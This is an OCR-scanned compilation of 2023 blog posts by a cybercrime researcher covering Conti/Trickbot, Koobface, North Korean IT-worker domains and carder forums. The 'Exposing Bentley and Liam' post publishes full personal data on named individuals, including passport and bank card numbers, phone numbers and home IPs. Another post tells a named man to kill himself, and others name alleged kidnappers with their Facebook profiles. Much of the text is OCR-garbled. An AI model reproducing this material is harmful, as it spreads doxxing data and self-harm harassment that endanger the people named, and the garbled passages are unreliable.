2023 
2023 - 10 
Upcoming "The Hacker Scene - 1983 - 2023" E-Book - 2023-10-03 02:17 


by Dancho Danchev 
Email: dancho.danchev@hush.com 
https://ddanchev. blogspot.com 


‘The single most in-depth and Th H k 
personal account of the hacker scene (= ac er 
from the years of the COCOM 

embargo and the hacker scene up to S cene = 

the present day modern cyber 


security industry from the one and 19 8 3 a 2 O02 3 


only Dancho Danchev" 


- Presented at the GCHQ with the Honeynet Project 
~ SCMagazine Who to Follow on Twitter for 2011 
- Participated in a Top Secret GCHQ Program called "Lovely Horse* 
- \dentified a major victim of the SolarWinds Attack - PaloAltoNetworks 
- Found malware on the Web Site of Flashpoint 
- Tracked monitored and profiled the Koobface Botnet and exposed one 
botnet operator 
- Made it to Slashdot two times 
- My Personal Blog got 5.6M Page Views Since December, 2005 
- My old Twitter Account got 11,000 followers 
- | had an average of 7,000 RSS readers on my blog 
- | have my own vinyl “Blue Sabbath Black Cheer / Griefer - We Hate You / 
Dancho Danchev Suck My Dick" made 
by a Canadian artist 
- Currently running Astalavista. box sk 
- | gave an interview to DW on the Koobface Botnet 
- | gave an interview to NYTimes on the Koobface botnet 
- | gave an interview to Russian OSINT 
- Listed as a major competitor by Jeffrey Carr's Taia Global 
- Presented at the GCHOQ 
- Presented at Interpol 
- Presented at InfoSec 

~ Presented at CyberCamp 
- Presented at RSA Europe 


Dear blog readers, 


I'm working on a new book. It's called "The Hacker Scene - 1983 - 2023" where | aim to 
dazzle you as always and as usual with all the juicy technical details that you're 
supposedly used to by now and will hopefully continue to be. 

| intend to release this throughout the Christmas season online for free on my 


Archive.org account. 
Thank you. 


The Most Innovative Leader in Cyber Security To Watch in 2023 Magazine 
Edition - 2023-10-03 02:17 


Dear blog readers, 
Here's the original article including the PDF here. 
Thank you. 


In Pursuit of 


Uobsthes 


ly. 4 oe 
Gis 
=zancney 


My First Twitter Space on How I Tracked Down The Conti Ransomware Gang 
Using Real-Time OSINT - 2023-10-03 02:17 


() Dancho Danchev @ Host 


How | Tracked Down the Conti Ransomware Gang 
Using Real-Time OSINT? 


64 tunedin: Sep 29. 25:13 


> Play recording 


Dear blog readers, 
Listen here. 


Enjoy. 


Me Participating in a Comparative Air Force Research Laboratory Information 
Directorate Technical Report on Botnets and Malware Detection - 2023-10-03 
02:17 


Table 10: Anecdotal cases of malicious domain names detected by Notos and the 
corresponding days that appeared in the public BLs .[1]: hosts-file.net, [2]: 
malwareurl.com, [3] siteadvisor.com, [4] virustotal.com, [5] ddanchey.blogspot.com, [6] 


malwaredomainlist.com. 


Domain Name 
lzwn.in 

3b9.ru 
antivirprotect.com 
Ispeed.info 
spy-destroyer.com 
free-spvbot.com 
a3lL.at 
gidromash.cn 
lantivirus-pro,com 
ericwanhouse.cn 
1165651291.com 


Just came across this. 


Outstanding. 


Who Can Assist With My Wikipedia Article Draft Submission? - 2023-10-03 


02:17 


Dear blog readers, 
Who can assist with my Wikipedia Article Draft submission here? Thanks. Much 


appreciated. 


= Draft:Dancho Danchev BA Add languages ~ 
Pat be ead (in View Nstory Tools 
From Wnpedt, te tree encyiopedta 


Dancho Danchev (Aare AsHves) (born November 22 1983) in Sofia is a cybersecurity researcher 
journalist and a blogger based in Bulparia, He lives in Toyan, 


Early Life (<o:) 
Dancho Danchev has been an active security blogger since 2007. He is a cybersecurity researcher and & 
\WholsKML API threat researcher!"¥2™1. He uns one of the security industry's most popular security 
‘publications with over 5.6§ page views Dancho Danchev’s Blog - Mind Streams of information Security 
Knowledge.'"! He is knawn for reporting first on the Chinese hacktivist” attack on CNN.com in 2008, the 
‘Operotion Abts attack on Wells Fargo U-S. Bank and FNC Bank and the New York Times advertisement 
attack in 2009"! 

‘He has been associated with ZDNet's Zero Day blog, where he co-wrote articles and analyses on East 
European criminal activity and online scams. Danchev’s research often focused on cyber terrorism 
activities of terrorist groups and monitoring the activities of the Koobface worm which targeted users of 
‘s0cia] networking sites, including Facebook, 

Danchev went missing in 2012, according to reports, after his blog post on the collection of his research 
‘n terrorist organisations’ use of the internet for jihad.!®*7 


Education jes) 


Dancho have studied in Vasil Levski Secondary Schoo! in Troyan Bulgaria and later on studied at 
Hogeschoo! Zuyd in Sittard The Netherlands and then at Hogeschoo! inMolland in Rotterdam The 
Netherlands, He holds a TOEFL certificate. 


Events jess) 

‘= Dancho is known to have presented at the Netherlands Intelligence Studies Association (NISA}'"! 

= Dancho is known to have presented the Keynote presentation at CyberCamp 2016 event in Spain!” 
‘+ Dancho is known to have presented at Cybersecurity Talks Bulgaria," 


‘Danche is known to have been running Astalavista Security Group's Astalavista.com'! in 2003 Web site 
and Astalavista.box sk Web site in 2022. 


Interviews (ese) 

= Dancho gave an interview to Deutsche Welle on the Koobface botnet!!?! 
‘= Dancho gave an interview to Linuxsecurity.com!!) 

‘= Dancho participated in a WholsXML API Podcast!#*! 

'= Dancho gave an interview to Russian OSiNT!=*! 


Disappearance |e) 


In September 2010, Danchev went missing under mysterious circumstances amid concems about his 
‘safety. Prior to his disappearance, he had expressed concems about surveillance by Bulgarian law 
‘enforcement and intelligence services, Despite efforts to contact him through various means, inchiding 
‘phone and emai, he could not be reached, ZDNet published a letter and photos he had sent, seeking 
Information on his whereabouts, While anonymous sources indicated he was alive but facing difMiculties, 
‘the exact details of his disappearance remain unknown. 


Major Achievements «in! 


+ Dancha is known to have participated in a Top Secret GCHO Program to monitor hackers online based 
‘on a document part of Edward Snowden's archive!) 

‘= Dancho is known to have discovered that Palodlto Networks is part of the SolarWinds supply chain 
malicious somware attack™™") 

+ Dancho is Known to have discovered that the Web site of Flashpoint has been compromised and was 
redirecting to matware!*”! 

+= Dancho is also known to have contributed to research involving the Avalanche and the Mumba 
botnets?" 

‘+ Dancho is known to have heavily contributed to various scereware related researchy?!! 

‘+ Dancho is known to have contributed to the use of search engines by cybereriminals in the context of 
backhnt SEO (search engine optimization) and malicious search engine resuts petsoning research?! 

+ Dancho ls known te have contributed research on the Luthuanlan cyber attacks and the Russia vs 
Georgia cyber attacks!®*! 

‘= Dancho is known to have Been running and maintaining the “Diverse Portfolio of Fake Security 
Software” blog posts on scareware blog posts series!?*! 

+= Dancho Danchey has been quoted on india's CAPTCHA solving econamy/?5) 

‘= Dancho is known to lead the threat intelligence market segment according to a comparative market 
study?" 


Awards (ese) 


‘+ Dancho won a Jessy M. Neal Award for Best Blog for ZDNet's Zero Day Blog in 2010/77! 
‘= Dancho also won 8 SCMagazine Social Media Award for “Five to Follow on Twitter in 20327"! 


Book Citations |e | 


‘= Dancho has been cited in Cyber Security Essentiats!?! 

+ Dancho has been cited in Security Awareness: Applying Practical Secunty in Your World®? 
+= Dancho has been cited in CompTlA Securty + Gude to Network Security Fundamentals!!! 
+ Dancho has been cited in Security + Guide to Network Security Fundamentals!”?? 
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Exposing Bentley and Liam From The Conti/Trickbot Malware Gang - 2023-10- 
07 02:24 


Member of the hacker group "TRICKBOT" 
(also known as the Wizard Spiders) 
"Ryuk", "Maze", "Conti", "Diavol") 


Account (nickname): liam 


Citizen of the Russian Federation 
Name: KORNEYEV ROMAN VIKTOROVYCH 
Date of birth: September 6, 1995 


A resident of St. Petersburg, Leningrad region of the 
Russian Federation. 

Driver's license: Ne 9906 549881 dated 16.05.2019 
Bank card: 427655005681 1014 Sberbank (RF) 


Mobile phone number: +79 117265801 

Telegram: 

Username: @romakorneev (Telegram-ID: 203978435) 
Skype: romankorneev2387 


E-mail address: krvthecreator@gmail.com 
E-mail: roman95(@gmail.com 
E-mail: romka95@mail.ru 


Jabber: liam@q3meco3Sauwestmt.onion 
Jabber: LiamNeeson@jabber.ru 
Jabber: liamliam@xmpp. jp 


Home IP addresses: 
188.243.183.226 
188.243.199.19 


Social networks: 

- https://www.facebook.com/profile php? id=100003668932901 
https://www.youtube.com/channel/UCUH8mm WenoKpm3pCQzOPB1w?view_as=s 
ubscriber, 

- https://www.youtube.com/wwwroman95 

- https://vk.com/id2 3893726 


An image is worth a thousand video. A video (hxxp://youtube.com/watch? 
v=QwXs_GvsF7M) is worth less. 


Sample photos include: 
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Member of the hacker group "TRICKBOT" 
(also known as the Wizard Spiders) 
"Ryuk", "Maze", "Conti", "Diavol") 


Account (nicknames): bentley / manuel / Max17 / volhvb 


Citizen of the Russian Federation 
Name: Galochkin Maxim Sergeevich 
Date of birth: May 19, 1982 


Identification number: 190119506002 

} Passport of a citizen of the Russian Federation: 
9511766005 dated 08.06.1999 

Registration address: Russian Federation, 
Khakassia, Abakan, st. Kirov, building 80, apt. 1 


Mobile phone number: +79 134448958 


Telegram: 

Name: Max The Tester 
Username: @volhvb, 
Telegram id: 32910255 


Jabber: bentley@q3mcco3 Sauwestmt.onion 
Jabber: benalien@xmpp.jp 
Jabber: volhvb@exploit.im 


Social networks: 

- https://twitter.com/volhvb 

- https://facebook.com/1505024528 
- https://vk.com/id520 1387 

- https://volhvb. livejournal.com 


Also check out the following (hxxp://youtube.com/watch?v=eqBJVa89rxXE). 


Sample photos include: 
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Stay tuned! 


Yavor Kolev - Part Four - 2023-10-13 19:34 


Dear, 


Don't tell me you got money to buy clothes? Is this a suit? Go grab some decent clothes 
first to begin with then go home and kill yourself. But do it loudly in the toilet but before 
that take a big "your work stuff" so that when we come to visit you we can take a photo 
of you in all of your glory the "your work stuff" part. 


Enjoy! 


Interrupting the Program to Showcase the BG Dishipts that Kidnapped Me! - 
2023-10-16 20:13 


An image is worth a thousand words. Law Enforcement is also. These are the dipshits 
that kidnapped me. Period. 


* 
. 


Exposing North Korea's IT Worker's Eden Programming Solutions WMD- 
Funding IT Services and Solutions Franchise - An Overview - 2023-10-22 20:24 


Jessus. This just in and | think | "did it" and | might even apply fore the Rewards for 
Justice program second time in a row this time believe it or on North Korea's WMD 
program in terms of tracking down North Korean IT workers that appear to have 
launched massive domain farms and are actively recruiting in the field of developers 
and IT workers to build mobile applications and web sites where the amount at least 
according to the U.S Government goes to fund their WMD program. 

In this analysis which | did in less than two hours time I'll expose the entire domain 
portfolio of North Korea's IT workers that are busy franchising across the glove 
potentially funding North Korea's WMD program at least according to the U.S 
Government and will offer in-depth peek inside their Internet-connected infrastructure. 


THIS DOMAIN HAS BEEN SEIZED 


This domain has been seized by the Federal Bureau of Investigation in accordance 
with a seizure warrant issued by the United States District Court for the Eastern District of 
Missouri as part of a law enforcement action against North Korean Information Technology 
(IT) Workers who used it as a software development and portfolio website to advertise and 

obtain remote IT freelancer jobs using fraudulent identities. 


For additional information on North Korea’s use of remote IT workers 
and how to identify them see the following advisories: 


1) Guidance on the DPRK Information Technology Workers — Treasury.gov 


— Enter “North Korean IT Workers Advisory” into any search engine — 


2) Additional Guidance on DPRK IT Workers — PSA at IC3.gov 


>> Report suspicious IT workers to IC3.gov << 


hxxp://edenprogram.com 
eden201621@gmail.com 
eden.company123@gmail.com 
Team 

Alex Banks 

Anastasiia Belenok 

Isaac Hunter 

James Baker 

Mark Rober 

Mason Church 

Tony Stewart 
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Alex Banks 
alexbgit80k 


Anastasiia Belenok 


anastas-bel 


Chris B 
chris-bgit 


Eden 
Eden2016 


Isaac Hunter 
ishunter216 


Jarnes Baker 
jbaker-git 


Mark Rober 
mark-rober21 


Mason Church 
mehurch21 


Tony Stewart 
tonyS2013 


Follow 


Follow 


Follow 


Follow 


Follow 


Follow 


Follow 
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Michael King Nick Abbate Tony Stewart Claude Roberson Tony Freeman 
Lead Developer Lead iOS & Android Full stack Mobile Full stack web ASP.NET & CF 
Developer Developer developer Expert 
Dmitriy Anisimoy Samuel Agrebi Ricardo Salazar David Nash Pedro Ortega 
Senior mobile Senior mobile & Senior UMUX Cryptocurrency Blockchain Expert 
developer web developer Designer developer 


Stanislav 
Cherneha 


27 May 2022 at 7:30 pm 


© H&TK MxtbopmauyMoHHble CucTemb! & NporpammupoBaHie 


Bcem gobpplli evapo! 

BoT 4 ONATb HacTaN TOT BeYep, KOra NPMLWNa Nopa YATATb O NO AAX KOTOPbIe HaM 
MHTePeCHbI, O KOTOPbIX NPHATHO BCNOMMHaTb. AMeHHO NOsTOMy NpogsomKaeM 
pyOpuky #BoinycKHMKM HaWwel CNeWUMaNnbHOCTH. 

KcTaTH, TOUHO 3HaeM, YTO BbI C HETePNeHMeM *KeTe HALUMX BeEYePHXx BbINYCKOB! 
Befjb AMEHHO 3THMM TOQbM Mb! POPAMMCA M4 Cc HeTepneHMeM ageM BcTpeUuu! He 
3afepPKMBaemMca yuTaeM >... 

1 tak 370 BbiIno He O4eHb faBHO MM MbI NOMHMM 3Toro YenoBeka. BbinycKHMK 2019 
roga Knonoes Aptyp. B roqbl yyebb! APTyP bln yYaCTHHKOM ONMMNMag M KOHKYPCOB 
NO NPOrPaMMUPOBSHHIO HM BCera salMlWan YecTb CNeWManbHOCTM 
#UHOPM aA MOHHbIe_CHCTeMbI, 4 BCeMO HipKeropogcKOrM 3KOHOMMKO- 
TeXHONOrMYeckoroe KONNewpKa. 

. Ha CerogHAWHH QeHb KMBeT B HipkHeM Hosropoge. 

1 Yuuter 6 HipkeropogcKoM focyfapCTBEHHOM aPXxMVTeKTYPHO-CTPOMTENbHOM 
YHMBePCHTeTe, CNeUMaNbHOCTh ‘T1porpaMMHaA MH KEHEPMA’, SAOUHO. 

! Kak 4B rogp! yyebb! NpogomKaeT paboTaTh NPOrpaMMMCTOM No yAaneHKe. 

1 Pafotaet Ha ayTcopce C HECKONbKAMM KOMNaHMAMM, TaKMMM Kak: 

- The Ready Games (https: //ready.gq/); 

- Ready Maker; 

- Eden Programming Solutions (https://edenprogram.com,}, HO KOMNaHMA BbICTyNaeT 
NOCPEeQHMKOM, a NpoekThi nog NDA; 

- A-Games (https://a-games.fun/}, c KOTOPOM paboTan B nocnegHee BpeMA: Wee “rpbl 
Ha MOBMNbHbIe MNaTpopMol. 

! Ssbiku NporpaMMMpoOBaHMA KOTOPbIe MCnONb3yeT B paboTe: OCHOBHOM C# M4 java 
407 HanvcaHiA ANarMHoes ANA aHgApomga, a objective-c 4nA nnarMos Ha ios, Rust. 
Hy HaKOHeL-TO BOCKNMKHeEM: Thi KK MPOTPAMMIUCT APTYP ll 


hxxp://github.com/Eden-programming 
hxxp://github.com/tonyS2013 
hxxp://github.com/mchurch21 
hxxp://github.com/mark-rober21 
hxxp://github.com/jbaker-git 
hxxp://github.com/ishunter216 
hxxp://github.com/Eden2016 
hxxp://github.com/chris-bgit 
hxxp://github.com/anastas-bel 
hxxp://github.com/alexbgit80k 
hxxp://dribbble.com/eden_software 
hxxp://www.guru.com/freelancers/eden-programming-solutions 
Team 

Michael King 

Nick Abbate 

Tony Stewart 


Claude Roberson 

Tony Freeman 

Dmitriy Anisimov 

Samuel Agrebi 

Ricardo Salazar 

David Nash 

Pedro Ortega 

Stanislav Cherneha 
hxxp://www.linkedin.com/in/michael-moore-682a51189 
Sample photos include: 


EDEN PROGRAMMING SOLUTIONS 
we build everything 


Related domains known to have been involved in the campaign include: 
hxxp://Kncw.or.kr/ 
hxxp://urbis.com.py/ 
hxxp://www.cijef.com/ 
hxxp://www.mcc-consulting.net/ 
hxxp://www.nanosoft.ae/ 
hxxp://www.nimble-apps.com/ 
hxxp://www.scarletsoftware.com/ 
hxxp://www.seglico.com/ 
hxxp://www.strate.ae/ 
hxxp://www.techsoftco.xyz/ 
hxxp://www.tekrazor.com/ 
hxxp://www.urbis.com.py/ 


hxxp://www.virtualwarein.com/ 
hxxp://advanzetech.com/ 
hxxp://akubohr.com/ 
hxxp://amsoftwarefactory.com/ 
hxxp://apncoders.com/ 
hxxp://avadhmicrosystem.in/ 
hxxp://bafv.suavilaser.es/ 
hxxp://blis4.co.nz/ 
hxxp://chamados.com.br/ 
hxxp://edenprogram.com/ 
hxxp://finnovion.com/ 
hxxp://ft3.group/ 
hxxp://fts77.ru/ 
hxxp://hasanitsolution.netlify.app/ 
hxxp://informatic.cl/ 
hxxp://letsoft.org/ 
hxxp://manin-hood.com/ 
hxxp://maps.google.com/ 
hxxp://mobicom.io/ 
hxxp://nanosoft.ae/ 
hxxp://opticosenriquehurtado.es/ 
hxxp://palmas.app/ 
hxxp://pbd.co. il/ 
hxxp://ponybelle.com/ 
hxxp://pro-codes.com/ 
hxxp://purpleqube.com/ 
hxxp://rlspencerroofing.com/ 
hxxp://springshare.com/ 
hxxp://support.google.com/ 
hxxp://template.wbs-dvp.pro/ 
hxxp://tiiastechsolutions.com/ 
hxxp://to-be-technology.fr/ 
hxxp://translate.google.com/ 
hxxp://trivamwebsolutions.com/ 
hxxp://tsv.mots.go.th/ 
hxxp://vyzkumne-infrastruktury-test.vm.cesnet.cz/ 
hxxp://www.4dbuilds.co.uk/ 
hxxp://www.advanzetech.com/ 
hxxp://www.asset.org.uk/ 
hxxp://www.calco.dk/ 
hxxp://www.chamados.com.br/ 
hxxp://www.crm-masters.pl/ 
hxxp://www.cybernaptics.mu/ 
hxxp://www.daslos-studios.com/ 
hxxp://www.easypages.url.tw/ 
hxxp://www.emaildoctor.org/ 
hxxp://www.indiamart.com/ 
hxxp://www.informatic.cl/ 
hxxp://www.leoconcept.de/ 
hxxp://www.netsupportsoftware.cl/ 
hxxp://www.olbericsolutions.com/ 
hxxp://www.purpleqube.com/ 
hxxp://www.rfcvela.com/ 


hxxp://www.royalbrokerage.net/ 
hxxp://www.sims.com.br/ 
hxxp://www.toshalinfotech.com/ 
hxxp://www.valueworkx.com/ 
hxxp://www.waynesolutionsinc.com/ 
hxxp://www.zwimbaengineering.com/ 
Related personally identifiable email address accounts known to have been 
involved in the campaign include: 
afahmyl[.]pro-codes.com 
henrique.lambert[.]hotmail.com 
saint5121[.]yahoo.com 
fastbone[.]fastmail.net 
itdoonsolutions[.]gmail.com 
meetchristopher[.]gmail.com 
t.oriol[.]salesclic.com 
asauma[.]tekrazor.com 
dev[.]nimble-apps.com 
drshmk[.]Jmsn.com 
shuki4tal[.]Jgmail.com 
t.oriol[.]nimble-apps.com 
yoenis.pantoja[.]gmail.com 
a.fahmy[.]windowslive.com 
kncw[.]chol.com 
asauma99[.]yahoo.com 
ubiktime[.]Jgmail.com 
t_oriol[.]yahoo.fr 
trivamwebsolutions[.]gmail.com 
afahmy[.]lymail.com 
rodrigo.madrid.a[.]gmail.com 
leogar07[.]gmail.com 
caseraghil[.]gmail.com 
Dinesh[.]INDIAMART.COM 
amine.benabou[.]gmail.com 
purplequbess[.]gmail.com 
skiran.pulidindil.]Jgmail.com 
info[.]chinacapital.com 
cassio[.]evolua.com.br 

Related personally identifiable email address accounts known to have been 
involved in the campaign include: 
careers[.]advanzetech.com 
Global-HR[.]Jadvanzetech.com 
contact[.Jadvanzetech.com 
info[.]Jakubohr.com 
info[.]amsoftwarefactory.com 
pathsoft-support[.]gmail.com 
kottenator[.]gmail.com 
avadhsoft[.]gmail.com 
avadhmicrosystem[.]gmail.com 
support[.]blis4.co.nz 
suporte[.]chamados.com.br 
hello[.]finnovion.com 
support[.]finnovion.com 
info[.]fts77.ru 


ventas[.]informatic.cl 
info[.]manin-hood.com 
optica[.]opticosenriquehurtado.es 
info[.]ponybelle.com 
a.fahmy[.]windowslive.com 
hello[.]purpleqube.com 
info[.]rlspencerroofing.com 
sales[.]Springshare.com 
info[.]springshare.com 
support[.]springshare.com 
asxvmprobertest[.]gmail.com 
info[.]Jinfinitetiias.com 
contact[.]to-be-technology.fr 
info[.]urbis.com.py 
web[.]vyzkumne-infrastruktury.cz 
kontakt[.]calco.dk 
info[.]demolink.org 
mail[.]demolink.org 
cijef[.]cijef.com 
office[.]crm-masters.pl 
info[.]daslos-studios.com 
support[.]emaildoctor.org 
sales[.]emaildoctor.org 
info[.]seglico.com 
contacto[.]mcc-cons.com 
contacto[.]mcc-consulting.net 
sales[.]nanosoft.ae 
info[.]nanosoftengineers.com 
info[.]nanosoft.sg 
info[.]midcoKuwait.com 
info[.]facilitazis.com 
enquiry[.]nanosoft.ae 
info[.Jolbericsolutions.com 
info[.]federacioncanariadevela.org 
Info[.]royalorokerage.net 
info[.]scarletsoftware.com 
support[.]scarletsoftware.com 
gabriel[.]seglico.com 
contato[.]sims.com.br 
corporate[.]strate.ae 
job[.]strate.ae 
privacy[.]strate.ae 
sales[.]tekrazor.com 
contactus[.]toshalinfotech.com 
info[.]virtualwarein.com 
contact[.]virtualwarein.com 
customersuccess[.]waynesolutionsinc.com 
support[.]waynesolutionsinc.com 
privacy[.]Jdemolink.org 
duvida[.]chamados.com.br 
comercial[.]chamados.com.br 
problema[.]chamados.com.br 
outros[.]chamados.com.br 


dpo[.Jevolua.com.br 
suporte[.]evolua.com.br 
info[.]maninhood.com 
info[.Jinetss.com 
mail[.]Jdemolimk.org 
info[.]Jdemolimk.org 
privacy[.]springshare.com 
jobs[.]springshare.com 
Stay tuned! 
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Where Is Anton Nikolaevich Korotchenko (AntoH HukosaeBuy KopotrueHko) 
Also Known as Koobface Botnet Master KrotReal? - Part Two - 2023-11-09 
01:07 


Facebook's Continued Fight Against Koobface 
by Facebook Security on Tuesday, January 17, 2012 at 9:09am 


It has almost been 3 year since we gave you our last update on the Koobface virus. After 
more than 3 years and numerous hours of working closely with industry leaders, the security 
community, and law enforcement, we are pleased to announce that Facebook has been free of 
infections for over 9 months, 


Today, Koobface is still impacting other web properties and continues to threaten security for 
Internet users across the globe, While we have been able to keep Koobface off Facebook, we 
won't declare victory against the virus until its authors are brought to justice. We feel it is the 
facebook interest of everyone online to work with law enforcement and the larger security community to 
identify the gang and see the full force of law brought to bear against those who have made 
millions in ill-gotten gains. To this end, we will be sharing our intelligence with the rest of the 
online security community in the coming weeks in an effort to rid the Web of this virus forever, 


[| Facebook Security's Notes 


To uphold our commitment to our users and the security of their data, Facebook takes 2 very 
aggressive approach against security threats ranging from the most annoying social spam to 
malicious viruses and malware, We have been awarded the largest damages ever under the 
CAN-SPAM Act, and we work with the authorities every single day to identify and prosecute 
wrongdoers, While we work diligenthy on removing these threats from the site, our Security 
Team is only truly satisfied when we can remove these threats from the Web entirely. As part 
of this continued fight against malware and cybercriminals, we wanted to give you an update 
on the Koobface virus. 


Get Notes via RSS 


When Koobface first surfaced in 2008, our team worked non-stop until we were able to detect 
the virus, remediate affected users, and eventually identify those parties responsible; we have 
been tracking them ever since. We will be sharing this investigation material, as well as 
information on how to best defend against the virus, with the larger security community. This 
will better enable sites still targeted by Koobface to more adequately protect their users. 


Koobface was able to generate profit through pay-per-click and traffic referral schemes, After 
installing malware on 2 user's device, the Koobface gang was able to redirect the user's traffic 
and, in some cases, trick the user into paying for fake antivirus software, Koobface was able to 
perform these actions by communicating with a central "Command & Control” server, which 
directed the compromised computers to do the gang's bidding. While we were able to stem the 
spread of the virus using 2 variety of tools (including our URL blacklist and Scan-And-Repair) 
the "Mothership’ was left untouched. 


This remained the case until last March, when Facebook Security was able to perform a 
technical takedown of this “Command & Control” Mothership. And since then we have 
had no new sightings of Koobface for over nine months and our teams are working hard to 
keep it that way. 


In addition to our work behind the scenes, we have built 2 number of tools that have made our 
security protections some of the best on the Web and have spearheaded numerous user 
education campaigns to make sure that everyone knows how to best protect themselves 
online. A particular success is the Scan-And-Repair tool we built with McAfee to help our users 
keep their devices malware-free, Also of note is our URL blacklist system - 2 core component 
of the Facebook Immune system. This URL blacklist not only protects users from malicious 
URLs that Facebook discovers, but also protects people from known-bad URLs from all of our 
external partners, 


Nothing is more important to us than ensuring the security and safety of our users and their 
data. Thankfully, we aren't in this fight alone; cybersecurity is ¢ shared responsibility for law 
enforcement, industry and everyone who uses the Internet. We will continue to work with the 
broad security community and industry leaders, such as McAfee and Microsoft. We will stay 
firmly committed to our work with law enforcement in stopping these threats and bringing the 
bad guys to justice. Cybercrime involves and impacts real people, and we praise those in the 
security community for coming together to expose those who have broken the law. We are 
confident that our work in identifying those responsible will put 2 significant dent in their ability 
to harm those online and lead to 2 safer internet for all, 


To find out more about Koobface please see the latest New York Times article or visit the 
Facebook Security Page. 


Jessus. Just came across this and | decided to elaborate. It's 2012 and no one is fighting 
Koobface. It's just me doing research with success at the time. 

If an image is worth a thousand words then check out some of the most recent publicly 
accessible photos of Anton Nikolaevich Korotchenko also known as Koobface botnet 
master KrotReal including some sample maps of his latest visits across the globe 


including possibly the fact that he's visited the United States which is quite a news 
taking into consideration his online activities counting the total number of cities that he 
has visited internationally up to 65. 
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Stay tuned! 


The Conti Ransomware Gang - 2023-11-14 19:37 
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An image is worth a thousand words. Video and related images courtesy of the Conti 
Ransomware Gang is worth more. Go through my original research here and my Conti 
Ransomware Gang compilation here. 


Sample photos: 
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Stay tuned! 


The Conti Ransomware Gang - Videos - Part Two - 2023-11-16 19:53 


An image is worth a thousand words. Videos courtesy of the Conti Ransomware gang are 


worth more. Check out the following including my Conti Ransomware Gang research 
compilation here. 


Sample videos: 


Stay tuned! 


Interrupting the Program to Showcase the BG Dishipts that Kidnapped Me! - 
Part Two - 2023-11-24 04:49 
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An image is worth a thousand words. 
Sample photos: 


BS 


MIHAEL GRYUN 


Sample Facebook accounts: 
https://www.facebook.com/profile.php?id=100005932519460 - NaBnanH Teoprues 
https://www.facebook.com/profile.php?id=100030506870037 - Bacun FayescKku 
Stay tuned! 
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An image is worth a thousand words. 
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Key Features 


Thanks to an individual approach to each client when you work with our system 
you have 

- Online statistics updated in real time 

- A 24-hour support service ready to answer all your questions 

- Absolutely no shaving and total independence of your statistics from other 
system users 

- Stable weekly payments on virtually all payment systems: Fethard, WebMoney 
Wire, e-gold, Western Union (WU). MoneyGram, Anelik and ePassporte, and 
PayPal 


- For regular clients and for those making more than 5000 installs per day — higher <> SF 


rates for all countries and special working conditions 
We have more than 8 years’ experience in working with installs. Our regular clients 
include more than 1000 webmasters who are all pleased to work with us 
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An image is worth a thousand words. 
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Loader botnet. Working: Windows XP SP 1/2/3, Windows Vista. Bots is testing loads 20k mixed traffic - bots connect to admin ~21k 
(~92%). 
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An image is worth a thousand words. 
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China vs Iran Hacktivism Campaign - 2023-11-24 12:14 


An image is worth a thousand words. 
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An image is worth a thousand words. 


File Edit View Bookmarks Widgets Mail Tools Help 
PEO OOQ|®D & iW htesticarder.suy Sie] x 
Q D Find Next » Voice Dauthor Mode * Osrow Images Dire to Width |G) 100% | + 


a. = 
@ vBulletin Message 


vBulletin Message 


cnnaTHo B 


All times are GMT +4, The time = 04; Mark Forums Read | View Forum Leaders 


O- @ro0x 


File Edit View Bookmarks Widgets Mail Tools Help 
(D Whrrotoss ssnon cn -Verifi... X GHawn Aedeticut -crpa... % | ih Carder.Su- all About Se... | f= 


OOO OOS |F D httoitcarder.su 
Q Dring Next » Voice Dauthor Mode * Oshow Images Dire to Width |@) 100% 


@ vBulletin Message 


vBulletin Message 


W BocTaHoBHn! 


All times are GM ow is 0 Mark Forums Read | View Forum Leaders 


Carder.Su - Archive - Top 


@atin Opaska Bua 2 XKypHan Baknaakn MxcTpymeHTbi Cnpaska 


SD - SG LD Mtiticarder.sulad-ka.cardiindex.php?lac=plusin.php%3Fdo% 3Dproduct [>| B) (Gl-[sccate q 


> HayanbHaa cTpaHHua &® Nocne anne 3aronosKH 


Admin Control Panel (vBulletin 3.8 Forum Home Page | Log Out 


User Manager 


vBulletin Options 
Bulletin Options 

chTy 
Human Verification Manage 


ial Bookmarking 


Styles & Templates 


Advanced Search Help (2 


f you ea blank it will 


Find Updated Templat 


Languages & Phrases 


Search in Phrases 
Down } Upload Language 


Find Updated Phra: 


FAQ 
FAQ Manage 
Add New FAQ 


Notices 


Totoso: 


File Edit View Bookmarks Widgets Mail Tools Help 

i % |i spasiwo-carder.su-a... | fe 

POO DOG & wi hitte:ticarder.su/showthread.php7t=35071 Sie) x 
Q D Find Next » Voice Dauthor Mode + Osrow Images IDtrie to Width |@) 100% | + 


arder.Su - All ork > orum flame, lol 


SPASIBO 


Flood, flame, lol Pasroeopti Ha n ems, wMop 780 9 0 Kapanure w Kapaepax. enaemeili pasaen t 


1 MYLUeK raMMY-KYyAMY nNepecta VULECTBOBAaTb ef mMyAUSN 


¥ View First Unread Thread Tools ¥ 


SPASIBO 


IBO 


DELAI MNE REPU MILL’ 


*Poma* is online now 
Join Dat 
P 


Reputation: 


4 > 
O- @ro0x 


*31 


File Edit Yiew Bookmarks Widgets Mail Tools Help 


0D See. < Qe, < 


| LL SPASIBO - Carder.Su- A... X + 


PED DO © J ii htterticarder.su/showthread.php?t=35071 Sie = 
Q 3 Dring Next » Voice Dauthor Mode * Oshow Images ID tre to Width |@) 100% 


best regards, 


OpenVPH, pntp, DoubleVPH 


- All About S 


> 


10' @~ @ 100% + 


File Edit 


= ee BUX | ji sPastso - Carder.su-a... X| ; 
(9) Aj & | ith http://carder.su/showthread.php?t=35071 Bile = 


Q D Find Next Y) Voice Oo Author Mode > Osrow Images ID tre to width @) 100% » 


FUCK YOU - 
Admin Cl 


cn = > 


10: O- Disk zg 


File Edit View Bookmarks Widgets Mail 


: 


Tools Help 


iLL SPASIBO - Carder.Su-.. X | ii PasoGnauenne "Pom... | fe 
PEO OOQ|®D & wi httesticarder.suy Sie 
Q D Find next » Voice Dauthor Mode > Osrow Images IDtrit to Width |G) 100% | ¥ 


10: G~ @ 00% S 


File Edit Yiew Bookmarks Widgets Mail Tools Help 


(8) X DA SPASIBO-Carder.Su-... % | ib PasoGnauetne "Pom... | Sf 
PEO OOO & |W httrsticarder.suy ~"a = 
Q O Find Next » Voice D author Mode > Osrow Images IDtre to Width |@) 100% 


Pa300.s1a 


ona 


Tipucem ecemy andezpa 


FUCK YOU - 
Admin Cl 


best regards, 
by Trevelyan $) 


10' © - |@ 100% si 


File Edit ‘Yiew Bookmarks Widgets Mail Tools Help 


POO DOQ®D J ii hitte:ticarder.sufindex.php 
Q D Find Next 


& Carder.Su - All About Security in Network 


Forum 


Selling dum 


Mod Bot v1.1 Malicious Software - 2023-11-24 12:14 


